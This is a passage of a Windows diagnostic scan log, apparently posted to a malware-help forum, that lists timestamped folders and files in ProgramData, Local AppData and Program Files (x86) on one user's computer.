[2018/03/22 18:54:19 | 000,000,000 | ---D | M] -- C:\ProgramData\ITbrain
[2018/04/25 20:25:58 | 000,000,000 | RHSD | M] -- C:\ProgramData\Key-Base
[2016/07/16 19:44:16 | 000,000,000 | ---D | M] -- C:\ProgramData\KONAMI
[2017/08/15 14:33:48 | 000,000,000 | ---D | M] -- C:\ProgramData\Leawo
[2018/12/31 11:33:37 | 000,000,000 | ---D | M] -- C:\ProgramData\Malwarebytes
[2017/06/29 19:24:28 | 000,000,000 | ---D | M] -- C:\ProgramData\Martau
[2017/12/28 12:29:30 | 000,000,000 | ---D | M] -- C:\ProgramData\Matrox
[2017/12/28 12:29:30 | 000,000,000 | ---D | M] -- C:\ProgramData\Matrox Graphics Inc
[2018/08/17 12:02:56 | 000,000,000 | ---D | M] -- C:\ProgramData\McAfee
[2015/12/01 16:29:15 | 000,000,000 | -HSD | M] -- C:\ProgramData\Menu Démarrer
[2018/12/29 10:24:13 | 000,000,000 | --SD | M] -- C:\ProgramData\Microsoft
[2016/04/03 17:31:57 | 000,000,000 | ---D | M] -- C:\ProgramData\Microsoft Help
[2018/07/23 08:28:40 | 000,000,000 | ---D | M] -- C:\ProgramData\Microsoft OneDrive
[2018/05/03 20:23:04 | 000,000,000 | ---D | M] -- C:\ProgramData\Mirillis
[2015/12/01 16:29:15 | 000,000,000 | -HSD | M] -- C:\ProgramData\Modèles
[2018/10/13 08:18:55 | 000,000,000 | ---D | M] -- C:\ProgramData\NCH Software
[2016/02/18 12:40:56 | 000,000,000 | ---D | M] -- C:\ProgramData\Nexon
[2016/02/18 12:41:52 | 000,000,000 | ---D | M] -- C:\ProgramData\NexonEU
[2017/08/15 14:33:49 | 000,000,000 | ---D | M] -- C:\ProgramData\Norton
[2016/11/25 16:40:57 | 000,000,000 | ---D | M] -- C:\ProgramData\NortonInstaller
[2018/10/04 18:42:06 | 000,000,000 | ---D | M] -- C:\ProgramData\NVIDIA
[2018/09/14 17:09:22 | 000,000,000 | ---D | M] -- C:\ProgramData\NVIDIA Corporation
[2017/04/16 07:08:29 | 000,000,000 | ---D | M] -- C:\ProgramData\Oracle
[2018/02/18 11:31:36 | 000,000,000 | ---D | M] -- C:\ProgramData\Package Cache
[2018/12/28 10:12:18 | 000,000,000 | ---D | M] -- C:\ProgramData\ProductData
[2016/08/17 12:36:25 | 000,000,000 | ---D | M] -- C:\ProgramData\PUSH Entertainment
[2015/12/01 16:55:33 | 000,000,000 | ---D | M] -- C:\ProgramData\Ralink Driver
[2018/04/26 08:43:54 | 000,000,000 | ---D | M] -- C:\ProgramData\Razer
[2018/05/04 09:58:46 | 000,000,000 | ---D | M] -- C:\ProgramData\regid.1986-12.com.adobe
[2018/05/04 09:58:46 | 000,000,000 | ---D | M] -- C:\ProgramData\regid.1991-06.com.microsoft
[2016/01/19 15:16:42 | 000,000,000 | ---D | M] -- C:\ProgramData\Riot Games
[2018/08/17 13:17:41 | 000,000,000 | ---D | M] -- C:\ProgramData\Roblox
[2017/07/10 20:25:32 | 000,000,000 | ---D | M] -- C:\ProgramData\ScanSoft
[2018/09/25 18:39:25 | 000,000,000 | ---D | M] -- C:\ProgramData\Screaming Bee
[2017/12/06 13:20:52 | 000,000,000 | ---D | M] -- C:\ProgramData\Skype
[2017/12/29 11:05:07 | 000,000,000 | ---D | M] -- C:\ProgramData\Software
[2017/09/29 14:46:33 | 000,000,000 | ---D | M] -- C:\ProgramData\SoftwareDistribution
[2018/05/06 17:05:44 | 000,000,000 | ---D | M] -- C:\ProgramData\Splashtop
[2016/06/30 10:03:29 | 000,000,000 | ---D | M] -- C:\ProgramData\SplitMediaLabs
[2017/08/15 14:33:49 | 000,000,000 | ---D | M] -- C:\ProgramData\Spybot - Search & Destroy
[2017/09/16 11:37:10 | 000,000,000 | ---D | M] -- C:\ProgramData\Stardock
[2017/05/07 07:35:26 | 000,000,000 | ---D | M] -- C:\ProgramData\Steam
[2017/08/15 14:39:35 | 000,000,000 | ---D | M] -- C:\ProgramData\SUPERAntiSpyware.com
[2017/04/14 18:34:39 | 000,000,000 | ---D | M] -- C:\ProgramData\SuperBoost
[2018/12/31 11:22:40 | 000,000,000 | ---D | M] -- C:\ProgramData\SWCUTemp
[2018/09/25 18:27:43 | 000,000,000 | -HSD | M] -- C:\ProgramData\SyncCenterMicrosoft
[2016/07/19 18:22:24 | 000,000,000 | ---D | M] -- C:\ProgramData\TargemGames
[2017/08/14 11:52:29 | 000,000,000 | ---D | M] -- C:\ProgramData\TechSmith
[2016/06/03 16:18:55 | 000,000,000 | ---D | M] -- C:\ProgramData\thriXXX
[2016/11/18 20:15:17 | 000,000,000 | ---D | M] -- C:\ProgramData\Thunder Network
[2018/06/27 12:21:44 | 000,000,000 | ---D | M] -- C:\ProgramData\TrackMania
[2018/05/11 19:54:21 | 000,000,000 | ---D | M] -- C:\ProgramData\Twitch
[2018/05/04 09:13:44 | 000,000,000 | ---D | M] -- C:\ProgramData\USOPrivate
[2018/05/04 09:13:43 | 000,000,000 | ---D | M] -- C:\ProgramData\USOShared
[2017/05/06 08:16:38 | 000,000,000 | ---D | M] -- C:\ProgramData\VEGAS
[2017/08/25 10:05:42 | 000,000,000 | ---D | M] -- C:\ProgramData\VsTelemetry
[2016/06/15 13:48:54 | 000,000,000 | ---D | M] -- C:\ProgramData\WEBZEN
[2016/02/14 22:04:42 | 000,000,000 | ---D | M] -- C:\ProgramData\Windows App Certification Kit
[2017/09/30 15:41:52 | 000,000,000 | ---D | M] -- C:\ProgramData\WindowsHolographicDevices
[2017/08/10 14:22:45 | 000,000,000 | ---D | M] -- C:\ProgramData\Wondershare
[2017/03/30 19:37:14 | 000,000,000 | ---D | M] -- C:\ProgramData\X360CE
[2018/12/26 11:42:39 | 000,000,000 | ---D | M] -- C:\ProgramData\YPNSR4TP8FWAGC1OSLMM
[2018/12/26 11:43:11 | 000,000,000 | ---D | M] -- C:\ProgramData\{04BD92B5-1B14-82BC-6C06-3F0E6CE1665F}
[2018/12/29 18:12:17 | 000,000,000 | ---D | M] -- C:\ProgramData\{74E9F814-C737-42CC-B721-DBBC4059367A}
[2018/12/26 11:43:11 | 000,000,000 | ---D | M] -- C:\ProgramData\{86C43796-BE37-00C5-4FA3-468C4F441FDD}
[2018/08/17 12:03:30 | 000,000,000 | ---D | M] -- C:\ProgramData\{D2C217A1-5880-9D67-DE46-0325440488EB}

[color=#A23BEC]< %LocalAppData%\* >[/color]
[2017/05/14 18:39:31 | 007,290,368 | ---- | M] () -- C:\Users\Thinkcentre\AppData\Local\agent.dat
[2017/05/14 18:39:31 | 000,070,800 | ---- | M] () -- C:\Users\Thinkcentre\AppData\Local\Config.xml
[2016/05/25 16:49:38 | 000,003,584 | ---- | M] () -- C:\Users\Thinkcentre\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2018/12/26 11:42:33 | 000,016,384 | ---- | M] () -- C:\Users\Thinkcentre\AppData\Local\dgkege.dll
[2018/12/08 14:00:12 | 006,291,456 | -H-- | M] () -- C:\Users\Thinkcentre\AppData\Local\IconCache.db
[2016/05/22 19:29:49 | 000,017,460 | -H-- | M] () -- C:\Users\Thinkcentre\AppData\Local\IconCache.db.backup
[2017/05/14 18:36:02 | 000,140,800 | ---- | M] () -- C:\Users\Thinkcentre\AppData\Local\installer.dat
[2017/05/14 18:39:31 | 000,005,568 | ---- | M] () -- C:\Users\Thinkcentre\AppData\Local\md.xml
[2017/05/14 18:39:31 | 000,126,464 | ---- | M] () -- C:\Users\Thinkcentre\AppData\Local\noah.dat
[2017/12/29 22:49:51 | 000,000,831 | ---- | M] () -- C:\Users\Thinkcentre\AppData\Local\Nox_crash.log
[2018/09/27 17:11:48 | 000,000,000 | ---- | M] () -- C:\Users\Thinkcentre\AppData\Local\oobelibMkey.log
[2018/01/31 18:16:23 | 000,001,483 | ---- | M] () -- C:\Users\Thinkcentre\AppData\Local\recently-used.xbel
[2017/03/24 17:31:27 | 000,007,598 | ---- | M] () -- C:\Users\Thinkcentre\AppData\Local\Resmon.ResmonCfg
[2017/05/14 18:39:30 | 001,894,851 | ---- | M] () -- C:\Users\Thinkcentre\AppData\Local\Truestring.tst
[2017/05/14 18:39:40 | 000,032,038 | ---- | M] () -- C:\Users\Thinkcentre\AppData\Local\uninstall_temp.ico

[color=#A23BEC]< %LocalAppData%\*. >[/color]
[2017/10/10 21:04:42 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\4kdownload.com
[2018/09/29 09:03:23 | 000,000,000 | -H-D | M] -- C:\Users\Thinkcentre\AppData\Local\501b5b2430b41dbb
[2017/08/16 08:20:01 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\ActiveSync
[2018/12/31 10:09:11 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Adobe
[2016/03/27 12:30:38 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Allegiant
[2017/07/14 13:51:33 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Ankama
[2018/05/04 09:08:12 | 000,000,000 | -HSD | M] -- C:\Users\Thinkcentre\AppData\Local\Application Data
[2018/02/21 17:00:06 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Astro
[2018/07/03 09:40:05 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\ATI
[2017/06/07 12:35:30 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\AVAST Software
[2017/11/10 19:04:34 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\AWSToolkit
[2016/08/11 13:47:36 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\BANDAI NAMCO Games
[2018/11/25 00:34:18 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Battle.net
[2018/10/19 16:26:51 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\BattlEye
[2016/02/07 14:01:18 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Blizzard
[2016/01/25 11:33:59 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Blizzard Entertainment
[2018/06/20 14:30:54 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Bluestacks
[2016/01/19 15:19:50 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\CEF
[2017/11/27 21:41:44 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Championify
[2018/08/17 12:04:57 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\chromium
[2017/12/06 15:31:03 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Clover
[2018/08/07 16:51:02 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Comms
[2018/09/25 19:07:10 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\ConnectedDevicesPlatform
[2018/12/31 11:35:23 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\CrashDumps
[2016/05/18 16:09:11 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\CrashReportClient
[2017/10/11 15:33:59 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\CrashRpt
[2018/01/04 19:47:49 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Cv2_Base
[2018/05/05 22:15:57 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\DBG
[2018/12/14 22:29:11 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Diagnostics
[2018/05/01 20:45:25 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Discord
[2016/07/17 10:10:18 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Disc_Soft_Ltd
[2017/11/10 19:03:07 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Downloaded Installations
[2018/01/17 13:47:23 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\drmingw
[2017/08/15 14:33:55 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Dropbox
[2017/09/27 16:06:37 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\DuelofSummoners
[2018/08/13 15:00:13 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\DunDefLauncher
[2018/12/14 22:29:12 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\ElevatedDiagnostics
[2017/10/01 09:24:02 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\EpicGamesLauncher
[2018/08/20 14:21:20 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\fontconfig
[2017/10/01 10:01:38 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\FortniteGame
[2018/09/25 19:00:48 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\FreemakeVideoConverter
[2018/08/07 23:37:30 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Gameloft
[2017/06/15 16:33:12 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\gegl-0.2
[2018/12/29 18:00:03 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Google
[2018/06/08 19:36:56 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\HirezLauncherUI
[2018/05/04 09:08:12 | 000,000,000 | -HSD | M] -- C:\Users\Thinkcentre\AppData\Local\Historique
[2018/01/16 21:54:49 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\IronSnout
[2016/05/14 16:22:30 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\IsolatedStorage
[2018/05/06 18:19:17 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\LoiLo
[2017/08/15 14:49:48 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Macromedia
[2017/12/28 12:29:30 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Matrox
[2018/12/29 18:10:12 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\mbamtray
[2018/10/21 11:57:45 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\MegaDownloader
[2018/05/04 11:33:24 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Microsoft
[2017/08/15 15:46:39 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\MicrosoftEdge
[2017/01/01 13:00:02 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Movie Studio
[2017/08/15 20:47:18 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Mozilla
[2017/08/01 08:54:06 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\MultiPlayerManager
[2017/05/15 17:13:56 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\navi
[2017/08/16 10:26:23 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\NCStreaming
[2017/09/16 11:41:30 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Ndemic Creations
[2018/11/17 17:54:46 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Nexon
[2018/01/13 11:13:29 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Notepad++
[2018/10/26 10:56:08 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Nox
[2017/08/15 14:33:59 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\NPE
[2018/12/01 15:35:26 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\NVIDIA Corporation
[2016/02/18 12:38:53 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\NXEPassportClient
[2018/10/21 21:59:41 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Oblivion
[2017/12/09 14:08:01 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Ori and the Blind Forest DE
[2016/11/10 20:29:05 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\OrionGame
[2018/01/27 18:47:22 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\osu!
[2018/12/06 18:18:38 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Packages
[2017/08/15 17:56:35 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\PeerDistRepub
[2018/09/27 17:00:16 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\PlaceholderTileLogoFolder
[2017/08/16 10:17:09 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Programs
[2018/05/04 09:32:00 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Publishers
[2016/08/17 12:36:25 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\PUSH Entertainment
[2017/09/05 18:18:43 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\P_Knockback
[2016/12/20 11:54:50 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\QQSM
[2018/07/11 09:00:24 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\RadeonInstaller
[2018/04/25 16:51:36 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Razer
[2018/08/22 09:14:23 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Roblox
[2017/08/16 08:17:40 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Scansoft
[2018/04/25 17:11:37 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\SCE
[2017/08/25 18:36:33 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Shswardaming
[2016/03/05 11:33:24 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\SkinSoft
[2018/01/21 12:16:19 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Sony Corporation
[2016/04/09 18:17:14 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Sparta
[2016/04/01 18:25:07 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\speech
[2018/05/06 16:04:43 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Splashtop
[2017/12/06 17:04:33 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\SplitMediaLabs
[2018/12/25 09:23:00 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Spotify
[2018/04/25 18:50:08 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\SquirrelTemp
[2018/08/24 09:50:33 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Star Stable
[2017/08/15 14:34:05 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Stardock
[2017/09/16 12:28:50 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Stardock_Corporation
[2016/04/04 20:37:06 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Star_Vault
[2016/12/13 18:12:00 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Steam
[2017/10/01 09:02:13 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Supra Games
[2016/04/02 09:05:02 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\SWTORPerf
[2018/04/25 15:08:21 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\TeamViewer
[2017/06/22 18:26:08 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\TechSmith
[2018/07/09 19:56:09 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\TeemoAI
[2018/12/31 11:51:32 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Temp
[2018/05/04 09:08:12 | 000,000,000 | -HSD | M] -- C:\Users\Thinkcentre\AppData\Local\Temporary Internet Files
[2017/11/10 19:04:01 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Thalonet,_Inc._dba_Haste
[2018/09/22 13:27:03 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\TheCulling
[2018/05/04 09:30:27 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\TileDataLayer
[2017/03/12 10:58:42 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\UNDERTALE
[2017/10/01 11:13:08 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Unity
[2016/05/25 15:51:24 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\UnrealCrazyKiller
[2018/01/04 19:47:49 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\UnrealEngine
[2017/10/01 09:24:02 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\UnrealEngineLauncher
[2016/08/02 08:25:48 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\UWKProcess
[2016/03/27 13:29:23 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\VikingGame
[2017/04/14 12:32:22 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\VirtualStore
[2016/02/27 15:39:59 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\wf-launcher
[2017/08/15 14:34:05 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Windows Live
[2016/07/10 10:39:33 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\YesMessenger
[2018/12/19 15:54:01 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\You_Have_10_Secondsfinal

[color=#A23BEC]< %Userprofile%\Local Settings\* >[/color]

[color=#A23BEC]< %Userprofile%\Local Settings\*. >[/color]

[color=#A23BEC]< %Userprofile%\Local Settings\Application Data\* >[/color]

[color=#A23BEC]< %Userprofile%\Local Settings\Application Data\*. >[/color]

[color=#A23BEC]< %Userprofile%\AppData\Local\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\* >[/color]

[color=#A23BEC]< %Userprofile%\AppData\Local\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\*. >[/color]
[2018/12/29 18:17:31 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\AppData\Local\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\V7CY9NXX

[color=#A23BEC]< %Userprofile%\Local Settings\Application Data\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\* >[/color]

[color=#A23BEC]< %Userprofile%\Local Settings\Application Data\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\*. >[/color]
[2018/12/29 18:17:31 | 000,000,000 | ---D | M] -- C:\Users\Thinkcentre\Local Settings\Application Data\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\V7CY9NXX

[color=#A23BEC]< %programFiles%\* >[/color]
[2017/09/29 14:44:24 | 000,000,174 | -HS- | M] () -- C:\Program Files (x86)\desktop.ini

[color=#A23BEC]< %programFiles%\*. >[/color]
[2017/10/10 21:04:25 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\4KDownload
[2017/10/07 19:59:19 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Adobe
[2016/02/14 22:04:19 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Application Verifier
[2017/11/27 21:24:33 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\ATI Technologies
[2018/11/24 16:44:03 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Battle.net
[2018/05/02 18:12:11 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Bignox
[2018/06/20 14:31:19 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\BlueStacks
[2017/07/10 20:28:11 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Canon
[2018/09/25 19:06:18 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Common Files
[2018/07/11 09:07:43 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\CpuCoreParking
[2017/04/14 18:24:59 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Dashlane
[2018/05/17 09:14:02 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\EasyAntiCheat
[2018/02/06 18:04:26 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Glary Utilities 5
[2017/08/12 17:28:48 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Glarysoft
[2018/12/29 17:49:57 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Google
[2018/07/11 08:59:11 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Hama Mouse Assistant
[2018/11/25 13:34:14 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\InstallShield Installation Information
[2017/12/28 12:27:36 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Intel
[2017/07/31 20:45:08 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Intel Corporation
[2018/05/05 09:09:20 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Internet Explorer
[2018/02/06 18:27:03 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\IObit
[2017/10/01 11:10:58 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Java
[2018/05/04 21:53:37 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\LoiLo
[2017/12/28 12:29:30 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Matrox Graphics
[2018/01/05 18:37:21 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Microsoft
[2018/02/06 18:48:44 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Microsoft CAPICOM 2.1.0.2
[2016/03/20 10:00:39 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Microsoft Chart Controls
[2016/02/14 22:07:32 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Microsoft SDKs
[2016/02/14 22:07:27 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Microsoft Visual Studio 14.0
[2016/04/11 07:32:48 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Microsoft XNA
[2017/09/29 14:46:33 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Microsoft.NET
[2018/12/27 09:45:32 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Mozilla Firefox
[2018/12/27 09:45:33 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Mozilla Maintenance Service
[2018/05/04 09:58:45 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\MSBuild
[2016/03/20 18:58:07 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\MSECache
[2017/08/16 10:42:09 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\NCSOFT
[2016/03/20 09:54:21 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\NCWest
[2017/07/19 17:06:27 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Notepad++
[2017/07/31 22:31:58 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Nox
[2018/06/26 12:16:25 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\On Networks
[2018/05/15 18:48:12 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\OpenAL
[2016/01/18 16:42:32 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\OpenOffice 4
[2018/05/17 09:31:15 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Opera
[2017/10/01 12:05:28 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Raptr Inc
[2018/05/19 07:55:02 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\REALTEK
[2018/05/04 09:48:25 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Reference Assemblies
[2018/08/17 13:17:28 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Roblox
[2017/07/10 20:25:22 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\ScanSoft
[2017/10/07 20:02:53 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Scratch 2
[2016/07/11 08:07:48 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Spybot - Search & Destroy
[2017/10/27 07:56:18 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Stardock
[2017/04/14 18:34:37 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\SuperBoost
[2016/10/21 14:52:14 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\UltraISO
[2018/06/02 15:11:11 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\VB
[2016/01/18 16:54:48 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\VideoLAN
[2017/09/30 15:39:55 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Windows Defender
[2016/02/14 22:04:24 | 000,000,000 | ---D | M] -- C:\Program Files (x86)\Windows Kits
